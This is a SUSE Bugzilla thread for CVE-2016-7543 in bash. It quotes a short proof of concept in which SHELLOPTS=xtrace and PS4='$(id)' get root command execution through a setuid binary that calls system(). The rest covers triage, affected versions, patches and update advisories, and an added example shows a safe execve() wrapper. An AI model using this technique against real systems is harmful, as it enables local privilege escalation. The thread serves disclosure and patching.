Bugzilla – Bug 1001299
VUL-1: CVE-2016-7543: bash SHELLOPTS+PS4
Last modified: 2020-06-13 00:55:53 UTC
Reference: http://seclists.org/oss-sec/2016/q3/617

===================
The recent bash 4.4 patched an old attack vector regarding specially crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries using system()/popen().

https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html

"nn. Shells running as root no longer inherit PS4 from the environment, closing a security hole involving PS4 expansion performing command substitution."

# gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
# chmod 4755 ./test
# ls -l ./test
-rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
# exit
$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root)
Sat Sep 10 18:06:36 WET 2016

Sorry Tavis :P
===================

I've tried to reproduce this issue on the release bash version in 42.1 -- 4.2.47(1)-release (x86_64-suse-linux-gnu) -- but the first line (gcc -xc...) returned a command line dialogue instead of a test file. So please try to reproduce this issue on your side. Thanks!
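The report above depends on system() starting /bin/sh with the caller's environment. As an added example (not code from this bug or from bash), here is one way a privileged helper can run /bin/date without a shell and with a scrubbed environment; the allowlist, the fixed PATH and the function names are assumptions made for illustration.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Assumed allowlist: the only inherited variables the child may see. */
static const char *const KEEP[] = { "TZ", "LANG", NULL };

/* Copy allowlisted NAME=value entries from in[] into out[] (capacity cap),
 * after a fixed PATH. out[] is NULL-terminated; returns the entry count. */
size_t scrub_env(char *const in[], char *out[], size_t cap)
{
    size_t n = 0;
    if (cap < 2) { if (cap) out[0] = NULL; return 0; }
    out[n++] = "PATH=/usr/bin:/bin";
    for (size_t i = 0; in && in[i] && n + 1 < cap; i++) {
        const char *eq = strchr(in[i], '=');
        if (!eq) continue;
        size_t len = (size_t)(eq - in[i]);
        for (size_t k = 0; KEEP[k]; k++)
            if (strlen(KEEP[k]) == len && !strncmp(in[i], KEEP[k], len)) {
                out[n++] = in[i];
                break;
            }
    }
    out[n] = NULL;
    return n;
}

/* Run path with execve(): no /bin/sh in between, so SHELLOPTS and PS4
 * are neither passed on nor interpreted. Returns the exit status. */
int run_clean(const char *path, char *const env_in[])
{
    char *envp[8];
    char *const argv[] = { (char *)path, NULL };
    int status;
    scrub_env(env_in, envp, sizeof envp / sizeof envp[0]);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(path, argv, envp); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) { return run_clean("/bin/date", environ); }
```

This protects the helper regardless of which bash version is installed; the bash update referenced in this bug closes the same path on the shell side.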
bugbot adjusting priority
Why is this VUL-0 for the personal environment of root? PS4 is used for debugging by tracing, e.g. "bash -x" ... or with "set -x"
Agreed, don't see it as VUL-0 either. Can't reproduce on Leap 42.1, it just shows me my id
(In reply to Dr. Werner Fink from comment #2)
> Why is this VUL-0 for the personal environment of root? PS4 is used for
> debugging by tracing, e.g. "bash -x" ... or with "set -x"

OK, let me know when VUL-0, VUL-1... are used, because I report "as is" and the "Incidents" section is not available to me. :( Thanks!
http://www.securityfocus.com/bid/93183

Vulnerable:
==================
GNU GNU bash 3.1.4
GNU GNU bash 3.0.16
GNU GNU bash 2.3
GNU GNU bash 2.2.1
GNU GNU bash 2.2
GNU GNU bash 2.1
GNU GNU bash 2.0
GNU GNU bash 1.14.5
GNU GNU bash 1.14.3
GNU GNU bash 1.14.2
GNU GNU bash 1.14.1
GNU GNU bash 1.14
GNU GNU bash 4.3
GNU GNU bash 4.2
GNU GNU bash 4.1
GNU GNU bash 4.0
GNU GNU bash 3.2.48
GNU GNU bash 3.2
GNU GNU bash 2.05
GNU GNU bash 2.04
GNU GNU bash 2.03
GNU GNU bash 2.02
GNU GNU bash 2.01.1
GNU GNU bash 2.01
GNU GNU bash 1.14.7
GNU GNU bash 1.14.6
GNU GNU bash 1.14.4
==================

Not Vulnerable:
GNU GNU bash 4.4
From http://seclists.org/oss-sec/2016/q4/80 -- http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-047
(In reply to Mikhail Kasimov from comment #8)

bash43-048 you mean ... bash43-047 is for bug #1000396
(In reply to Dr. Werner Fink from comment #9)
> (In reply to Mikhail Kasimov from comment #8)
>
> bash43-048 you mean ... bash43-047 is for bug #1000396

Yes, seems https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-048
Sorry for the confusion.
This is an autogenerated message for OBS integration:
This bug (1001299) was mentioned in
https://build.opensuse.org/request/show/437124 13.2 / bash
openSUSE-SU-2016:2715-1: An update that solves two vulnerabilities and has one errata is now available.

Category: security (moderate)
Bug References: 1000396,1001299,976776
CVE References: CVE-2016-0634,CVE-2016-7543
Sources used:
openSUSE 13.2 (src): bash-4.2-75.5.1
Fixed from the POV of the maintainer. If anyone has another POV, reopen *and* reassign
SUSE-SU-2016:2872-1: An update that solves four vulnerabilities and has one errata is now available.

Category: security (moderate)
Bug References: 1000396,1001299,1001759,898812,898884
CVE References: CVE-2014-6277,CVE-2014-6278,CVE-2016-0634,CVE-2016-7543
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src): bash-4.2-82.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): bash-4.2-82.1
SUSE Linux Enterprise Server 12-SP1 (src): bash-4.2-82.1
SUSE Linux Enterprise Desktop 12-SP1 (src): bash-4.2-82.1
openSUSE-SU-2016:2961-1: An update that solves four vulnerabilities and has one errata is now available.

Category: security (moderate)
Bug References: 1000396,1001299,1001759,898812,898884
CVE References: CVE-2014-6277,CVE-2014-6278,CVE-2016-0634,CVE-2016-7543
Sources used:
openSUSE Leap 42.1 (src): bash-4.2-81.1
SUSE-SU-2017:0302-1: An update that solves two vulnerabilities and has two fixes is now available.

Category: security (moderate)
Bug References: 1000396,1001299,959755,971410
CVE References: CVE-2016-0634,CVE-2016-7543
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src): bash-3.2-147.29.1
SUSE Linux Enterprise Server 11-SP4 (src): bash-3.2-147.29.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src): bash-3.2-147.29.1
SUSE-SU-2018:1398-1: An update that solves two vulnerabilities and has one errata is now available.

Category: security (moderate)
Bug References: 1000396,1001299,1086247
CVE References: CVE-2016-0634,CVE-2016-7543
Sources used:
SUSE OpenStack Cloud 7 (src): bash-4.3-83.10.1
SUSE Linux Enterprise Workstation Extension 12-SP3 (src): bash-4.3-83.10.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src): bash-4.3-83.10.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src): bash-4.3-83.10.1
SUSE Linux Enterprise Server 12-SP3 (src): bash-4.3-83.10.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src): bash-4.3-83.10.1
SUSE Linux Enterprise Desktop 12-SP3 (src): bash-4.3-83.10.1
SUSE Enterprise Storage 4 (src): bash-4.3-83.10.1
SUSE CaaS Platform ALL (src): bash-4.3-83.10.1
OpenStack Cloud Magnum Orchestration 7 (src): bash-4.3-83.10.1
openSUSE-SU-2018:1419-1: An update that solves two vulnerabilities and has one errata is now available.

Category: security (moderate)
Bug References: 1000396,1001299,1086247
CVE References: CVE-2016-0634,CVE-2016-7543
Sources used:
openSUSE Leap 42.3 (src): bash-4.3-83.6.1
Update out there
SUSE-SU-2018:1398-2: An update that solves two vulnerabilities and has one errata is now available.

Category: security (moderate)
Bug References: 1000396,1001299,1086247
CVE References: CVE-2016-0634,CVE-2016-7543
Sources used:
SUSE Linux Enterprise Server 12-SP2-BCL (src): bash-4.3-83.10.1